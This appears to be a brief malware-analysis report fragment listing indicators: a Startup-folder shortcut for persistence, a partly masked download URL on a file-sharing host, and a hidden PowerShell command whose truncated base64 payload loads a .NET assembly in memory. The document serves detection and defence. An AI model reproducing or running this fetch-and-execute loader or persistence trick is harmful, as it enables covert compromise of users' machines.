Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\geeks hangout.url
- https://www.up##ad.ee/download/11424197/88658d252abf171246f6/a.txt
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (with hidden window)